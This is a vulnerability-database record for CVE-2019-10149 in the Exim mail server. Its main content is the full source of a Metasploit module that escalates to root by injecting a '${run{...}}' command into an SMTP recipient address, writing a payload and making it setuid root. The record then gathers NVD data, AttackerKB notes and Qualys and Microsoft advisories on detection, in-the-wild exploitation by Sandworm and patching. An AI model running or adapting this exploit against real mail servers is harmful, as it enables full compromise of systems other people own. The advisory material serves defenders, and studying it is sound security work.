{"id": "EDB-ID:47307", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)", "description": "", "published": "2019-08-26T00:00:00", "modified": "2019-08-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.exploit-db.com/exploits/47307", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-10149"], "lastseen": "2019-08-26T13:36:58", "viewCount": 546, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD"]}, {"type": "cve", "idList": ["CVE-2019-10149"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "msrc", "idList": ["MSRC:31C9A6AB6048DC2F0939A862156094A7", "MSRC:388A48CE67D2E58B0FB4372836DA1089"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994514"]}, {"type": "threatpost", "idList": ["THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154198", "PACKETSTORM:153312"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1524-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-32848", "1337DAY-ID-32869", "1337DAY-ID-33150"]}, {"type": "nessus", "idList": ["EXIM_4_92.NASL", "OPENSUSE-2019-1524.NASL", "DEBIAN_DSA-4456.NASL", "GENTOO_GLSA-201906-01.NASL", "UBUNTU_USN-4010-1.NASL", "ALA_ALAS-2019-1221.NASL", "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:46996", "EDB-ID:46974"]}, {"type": "cisa", "idList": ["CISA:0112C06A4ED522FC96CC36F94A083A95", "CISA:8012376262FFBCAA3DBEE889B5EE4625"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC/", "MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC"]}, {"type": "canvas", "idList": ["EXIM_EXPANSION_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852550", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310140090", "OPENVAS:1361412562310704456"]}, {"type": "freebsd", "idList": ["45BEA6B5-8855-11E9-8D41-97657151F8C2"]}, {"type": "amazon", "idList": ["ALAS-2019-1221"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD"]}, {"type": "ubuntu", "idList": ["USN-4010-1"]}, {"type": "gentoo", "idList": ["GLSA-201906-01"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4456-1:5D64B"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498", "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913"]}, {"type": "thn", "idList": ["THN:A947D0153E6D676ABBCCAB69CD1E73DB", "THN:66694DD5D9C12B2B7881AB6C960E34DC", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "securelist", "idList": ["SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}], "modified": "2019-08-26T13:36:58", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-08-26T13:36:58", "rev": 2}, "vulnersScore": 5.9}, "sourceHref": "https://www.exploit-db.com/download/47307", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend", "osvdbidlist": []}

{"attackerkb": [{"lastseen": "2020-11-18T06:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Exim unauthenticated RCE with reports that it\u2019s been used by [Sandworm since August 2019](<CVE-2019-10149>)\n\n \n**Recent assessments:** \n \n**ericalexanderorg** at May 28, 2020 4:49pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3**gwillcox-r7** at November 04, 2020 4:03pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n", "modified": "2020-05-28T00:00:00", "published": "2020-05-28T00:00:00", "id": "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD", "href": "https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149", "type": "attackerkb", "title": "CVE-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T07:12:45", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "title": "CVE-2019-10149", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-11T20:29:00", "cpe": ["cpe:/a:exim:exim:4.91"], "id": "CVE-2019-10149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exim:exim:4.91:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2019-06-15T00:29:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all versions of Exim's MTA from version 4.87 to 4.91. Exploitation of the vulnerability only requires a malicious email to be sent to a vulnerable server, and injected commands will typically run as root. There are multiple ways that Exim can be configured, and some of these will allow for faster exploitation, while others may require a week to fully exploit. For technical details on this vulnerability please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView, by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. To filter out the Potential detections (though these should be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92. Check your Linux OS vendor for updated packages.", "modified": "2019-06-14T22:27:14", "published": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (Russian hacker group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify assets that are impacted by this vulnerability in your environment: [Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nExim MTA vulnerability could be exploited by sending a malicious email to the server, allowing an attacker to run code on the server remotely. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nNSA mentioned Sandworm actors have been exploiting this vulnerability since at least August 2019. The actors exploited victims using Exim software on their public facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. Sandworm executed shell script to perform following action on victim's system:\n\n * Add privileged users\n * Disable Network Security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nThe unpatched systems are highly at risk and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. You can search for these QIDs in VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\n\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability as Qualys QID 50092 contains following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With 'live feed' updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. System admins can update respective linux distros using package manager or by downloading the latest version from <https://www.exim.org/mirrors.html>\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "modified": "2020-05-29T22:42:14", "published": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n&quot;Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts,&quot; said the NSA advisory. It also recommended &quot;critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage.&quot;\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core &amp; Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for &quot;Active Attack&quot; RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [&quot;NSA&#x27;s Top 25 Vulnerabilities from China&quot; dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2019-07-09T01:32:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not \u2026\n\n[ Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149) Read More \u00bb](<https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>)", "modified": "2019-06-14T00:27:32", "published": "2019-06-14T00:27:32", "id": "MSRC:31C9A6AB6048DC2F0939A862156094A7", "href": "https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-19T01:21:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>), in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.\n\nAzure has controls in place to help limit the spread of this worm from work we\u2019ve already done to [combat SPAM](<https://blogs.msdn.microsoft.com/mast/2017/11/15/enhanced-azure-security-for-sending-emails-november-2017-update/>), but customers using the vulnerable software would still be susceptible to infection.\n\nCustomers using [Azure virtual machines (VMs)](<https://azure.microsoft.com/services/virtual-machines/>) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe [Azure security best practices and 